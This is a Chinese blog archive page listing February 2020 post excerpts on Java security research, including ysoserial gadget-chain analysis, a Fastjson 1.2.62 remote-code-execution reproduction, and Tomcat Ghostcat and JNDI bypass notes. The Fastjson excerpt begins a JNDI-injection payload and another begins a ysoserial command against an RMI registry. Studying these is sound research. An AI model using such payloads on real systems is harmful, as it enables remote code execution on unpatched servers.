02 2020 档案

java反序列化-ysoserial-调试分析总结篇(2)
摘要:前言: 这篇主要分析commonCollections2,调用链如下图所示: 调用链分析: 分析环境:jdk1.8.0 反序列化的入口点为src.zip!/java/util/PriorityQueue.java 此时将会对队列调用siftdown函数,其中队列中包含了两个元素,其中一个即为temp 阅读全文
posted @ 2020-02-29 20:14 tr1ple 阅读(1531) 评论(2) 推荐(0)
java反序列化-ysoserial-调试分析总结篇(1)
摘要:前言: ysoserial很强大,花时间好好研究研究其中的利用链对于了解java语言的一些特性很有帮助,也方便打好学习java安全的基础,刚学反序列化时就分析过commoncollections,但是是跟着网上教程,自己理解也不够充分,现在重新根据自己的调试进行理解,这篇文章先分析URLDNS和co 阅读全文
posted @ 2020-02-28 21:59 tr1ple 阅读(6018) 评论(2) 推荐(2)
Fastjson <=1.2.62 远程代码执行-漏洞复现
摘要:影响范围: Fastjson<=1.2.62 需要开启autotype poc: String text1 = "{\"@type\":\"org.apache.xbean.propertyeditor.JndiConverter\",\"AsText\":\"rmi://127.0.0.1:109 阅读全文
posted @ 2020-02-23 11:30 tr1ple 阅读(17520) 评论(2) 推荐(4)
Apache Tomcat Ajp CVE-2020-1938漏洞复现
摘要:环境搭建: sudo docker pull duonghuuphuc/tomcat-8.5.32 sudo docker run -d -it -p 8080:8080 -p 8009:8009 --name ghostcat duonghuuphuc/tomcat-8.5.32 tomcat调试 阅读全文
posted @ 2020-02-22 20:41 tr1ple 阅读(1935) 评论(0) 推荐(0)
关于JDK高版本下RMI、LDAP+JNDI bypass的一点笔记
摘要:1.关于RMI 只启用RMI服务时,这时候RMI客户端能够去打服务端,有两种情况,第一种就是利用服务端本地的gadget,具体要看服务端pom.xml文件 比如yso中yso工具中已经集合了很多gadget chain 本地利用yso的打rmi注册表的模块 java -cp .\ysoserial. 阅读全文
posted @ 2020-02-20 12:09 tr1ple 阅读(7329) 评论(3) 推荐(0)
javaweb-codereview 学习记录-5
摘要:1.关于URLConnection 应用程序利用url与远程通信的所有类的超类 jdk1.8中支持的协议包括以上这些,gopher在jdk8中取消了。 java中默认对(http|https)做了一些事情,比如: 默认启用了透明NTLM认证 默认跟随跳转 httpURLconnection可能jdk 阅读全文
posted @ 2020-02-06 20:07 tr1ple 阅读(658) 评论(0) 推荐(0)
java 动态代理机制
摘要:代理模式是Java中常用的设计模式,主要由公共接口、被代理类和代理类等三部分组成,代理类持有被代理类的实类,代理为执行具体的类方法。其中代理类与被代理类有同样的接口。 代理类的对象本身并不真正实现服务,而是通过调用被代理类对象的方法来提供特定的服务。 代理分为静态代理和动态代理,编译时能确定被代理的 阅读全文
posted @ 2020-02-06 14:42 tr1ple 阅读(460) 评论(0) 推荐(0)
blackhat-New-Exploit-Technique-In-Java-Deserialization-Attack-笔记
该文被密码保护。
posted @ 2020-02-04 18:29 tr1ple 阅读(91) 评论(0) 推荐(0)